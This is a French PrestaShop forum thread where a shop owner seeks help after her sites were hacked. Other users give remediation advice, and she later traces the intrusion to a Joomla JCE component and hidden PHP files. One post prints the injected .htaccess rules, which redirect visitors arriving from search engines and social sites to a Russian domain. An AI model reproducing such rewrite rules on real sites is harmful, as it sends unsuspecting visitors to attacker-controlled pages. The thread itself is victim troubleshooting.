Jump to content

Boutiques piratées !


sarah0173

Recommended Posts

Bonjour à tous,

 

Voilà, depuis 24h maintenant, mes boutiques prestashop ont été piratée. Seule la page d'accueil est touchée et redirigée sur un site qui n'existe pas vraiment (pour vous rendre compte www.shop-addiction.com), pour les sous-pages, pas de souci. J'ai dégagé le code dans le htaccess qui était corrompu mais quelques minutes plus tard, le htaccess se modifie tout seul...

J'ai tenté de mettre en ligne une version "saine", quelques minutes plus tard, rebelotte, site piraté à nouveau...

Je ne sais plus quoi faire, est-ce déjà arrivé à l'un d'entre vous ?

Il y aurait-il quelqu'un pour me filer un ti coup de main ? (je suis prête à payer...)

Mon hébergeur sèche tout comme moi...

 

 

Merci, je suis un peu en panique...

Link to comment
Share on other sites

Bonjour

 

moi quand j'ai fais mon site on m'a conseiller d'installer crawlprocter sur mon serveur pour eviter le piratage. Tout semaine quand je me connecte sur mon compte crawlprotect il me donne une liste des tentative de priratage ect et me demande si je veux le bloquer.

 

voici le lien http://www.crawltrack.fr/crawlprotect/

 

Pour le souci du htaccess peut pas t'aider dsl. mais déja installe crawlprotect

Link to comment
Share on other sites

J'ai déjà vu sur le forum un problème similaire, la victime avait un virus sur son ordi qui envoyait les identifiant ftp (chopé sur filezilla) à un hackeur qui ensuite va lancer un logiciel qui va pirater ton site.

 

A faire :

- modifie les identifiants ftp

- passer ton ordi à l'antivirus (ou tout ordi qui s'est connecté par ftp à ton hébergeur)

- remettre ta boutique en ligne

Link to comment
Share on other sites

Merci pour ces conseils, je suis en train de faire un scan...

 

Voici le code htaccess corrompu

 

<IfModule mod_rewrite.c>

 

RewriteEngine On

 

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)

 

RewriteRule ^(.*)$ http://skamage.ru/disclamer?8 [R=301,L]

 

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)

 

RewriteRule ^(.*)$ http://skamage.ru/disclamer?8 [R=301,L]

 

</IfModule>

Link to comment
Share on other sites

Bonjour,

 

Pour savoir comment est modifier le fichier htaccess il faudrait avoir accès au Logs du serveur, ce qui est souvent difficile sur des mutualisés.

 

Par contre il est est dans 99% des cas un erreur humaine à la base de ce soucis.

 

Modifiez tout de suite vos mots de passe FTP, BO (vérifiez qu'il n'y a pas un nouveau compte employé), changez aussi les mots de passe de la base de données.

 

Si vous utilisez Filezilla il est conseiller aussi de se renseigner pour savoir comment sécuriser ses connections avec ce client FTP, comme il est le plus utilisé il est aussi le plus attaqué.

 

Après il peut être conseillé d'installer crawlprotect sur votre site comme le suggère Le-cathare.

 

Si après tout cela votre htaccess est encore modifié, contactez votre hébergeur pour avoir une aide pour accéder au log et voire ce qui provoque ce changement.

  • Like 1
Link to comment
Share on other sites

Bonjour,

J'ai nettoyé le pc, changer les mdp, remis les boutiques rien y fait.

Je m'aperçois également d'une chose, en fait tous mes sites sont en gros inaccessibles :

certains redirigent automatiquement sur d'autres sites comme shop-addiction et d'autres sont accessibles si on tape directement l'adresse dans la barre du navigateur, par contre, en recherchant le site via google ou un autre moteur de recherche, on est automatiquement redirigé (exemple : entre-girls.com)...

J'ai contacté mon hébergeur, voici sa réponse "Non le souci n'est pas côté serveur mais dans les scripts hébergés. La seule chose que je peux vous proposer à mon niveau et de contacter un programmeur qui travaille pour certaines de nos projets dès Lundi afin qu'il jette un oeil. ..."

je suis perdue...

Edited by sarah0173 (see edit history)
Link to comment
Share on other sites

tu as scanné ton ordi avec quoi ? si le htaccess est très régulièrement modifié c'est qu'il y a soit un fichier sur ton serveur qui le remet en place, soit c'est fait par ftp.

 

Pour savoir si c'est un fichier sur ton serveur tu peux tout effacer (vraiment tous les fichiers mais PAS la base de données) si le htaccess reviens c'est qu'il est ajouté par ftp.

Pour les logs tu peux les voir très facilement avec ton "manager" nommé aisni chez OVH mais pour o2switch je ne sais ce qui est possible, il faut les contacter

 

 

Autre question : tu as un joomla ou autre sur ton hébergeur ?

Link to comment
Share on other sites

J'ai scanné avec avast et malwaresbytes. Je pense vraiment que c'est un fichier sur le serveur, car j'ai même un htaccess qui se crée à la racine du serveur alors qu'à l'origine, il n'y en a pas...

Pour le ftp, j'ai déjà changé le mdp, je sèche...

Et sinon oui, j'ai joomla, presta et wordpress

Edited by sarah0173 (see edit history)
Link to comment
Share on other sites

Bon, le problème est très provisoirement réglé. Mon hébergeur à bloquer les ip étrangères le temps que je trouve le souci.

J'ai donc pu modifier tous les htaccess, il ne se modifie plus pour l'instant. J'ai également du vider mon cache. Je souffle un tout petit peu...

Link to comment
Share on other sites

Après il peut être conseillé d'installer crawlprotect sur votre site comme le suggère Le-cathare.

 

La seule fois ou j'ai utilisé ce "machin" cela m'a foutu un bordel monstre sur mon site car le moindre accès sql ou autre il le signale et il le bloque (même si l'accès vient de votre propre ip)

 

alors bon ! C'est gentils mais drolement ch....

Edited by labelandco (see edit history)
Link to comment
Share on other sites

Les outils "bizarres" tels que CrawlProtect n'ont pas a être installés avec PS qui est sécuritaire de base.

Ce cas de piratage, ce n'est pas le premier sur le forum et surement pas le dernier. Mais aucun lien avec la sécurité de Prestashop :

 

L'ordinateur de l'administrateur piraté, ses mots de passes volés ou keyloggués, et voila qu'un petit bot va se connecter au FTP et remplacer les fichiers index.php. Archi connu ! Cele contribu à la mode du "mass defacement" sur le Web.

 

Un bon antivirus + ne pas enregistrer de password sur son PC + de la méfiance sont dispensables sur le PC d'un admin !

Link to comment
Share on other sites

Pourquoi Outils "bizarres" ???

 

Moi j'aime bien CrawlProtect, et je l'utilise sur plusieurs sites, quelque soit le CMS et pas de problème de fonctionnement rencontré jusqu’à présent, par contre les log sont rempli de tentative....

 

Prestashop est certes bien sécurisé, mais personne n'est à l'abri, (je ne reviendrai pas sur une version rapidement mise à jour ;-)

Il existe également des failles PHP.....

Bref, certainement des failles qui sont toujours présentent aujourd'hui, mais qui n'ont pas encore été découvertes...

 

Sans devenir parano, la sécurité nécessite quand même un minimum d'attention.

 

Et comme dit "Web on dev", attention à vos propre machines !!!

Link to comment
Share on other sites

J'y suis arrivée ! Enfin surtout grâce à un copain admin réseau. Pour ceux que ça intéresse, la faille venait d'un joomla, et non d'un presta, qui a contaminé tous les autres, je pense aussi avoir trouvé la source du souci, un composant nommé jce. Le pirate a réussi à déposer sur le serveur trois fichiers en .nomdufichier (.jos_kaz.php ; .lib_h614ka.php) à différents endroits qui étaient appelés toutes les 20 minutes et obligeaient la maj des htaccess. Bref une saloperie.

Voilà !

Edited by sarah0173 (see edit history)
  • Like 1
Link to comment
Share on other sites

  • 2 months later...

Bonjour Sarah,

 

Ma boutique aussi semble être piratée. J'ai les même symptômes que toi, c'est à dire des liens qui sont sur ma page d'accueil qui sont redirigés vers un site qui a un nom de domaine proche.

Je vais ouvrir un autre post pour expliquer plus en détail mais je suis d'ors et déjà intéressé, par tout ce que tu as pu mettre en œuvre pour venir à bout de ce piratage.

Mon htaccess ne semble pas avoir été modifié.

Merci d'avance à ceux qui vont m'aider

Link to comment
Share on other sites

Bonjour Sarah,

 

Ma boutique aussi semble être piratée. J'ai les même symptômes que toi, c'est à dire des liens qui sont sur ma page d'accueil qui sont redirigés vers un site qui a un nom de domaine proche.

Je vais ouvrir un autre post pour expliquer plus en détail mais je suis d'ors et déjà intéressé, par tout ce que tu as pu mettre en œuvre pour venir à bout de ce piratage.

Mon htaccess ne semble pas avoir été modifié.

Merci d'avance à ceux qui vont m'aider

 

Tu n'as que quelques liens qui pointent vers un autre site ?

Moi c'était l'ensemble du site qui était redirigé + modif des htaccess

 

As tu d'autres sites que tu gères sur le même espace ?

 

Essaye de comparer ton site piraté avec une sauvegarde saine pour voir si il n'y à pas de fichiers bizarres qui sont apparus.

Link to comment
Share on other sites

Bonjour Sarah,

Merci pour ta réponse.

Effectivement ce ne sont que quelques liens qui pointent vers ce site.

Je vais abandonner Filezilla et changer tous mes mots de passe.

Pour l'instant il n'y a pas de catastrophe, mais je vais tenter de blinder la sécurité pour éviter les problème.

Merci pour le conseil de comparer avec une ancienne sauvegarde, comment fais tu cela ?

J'ai des sauvegardes que je pense saine.

Merci à toi,

++

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...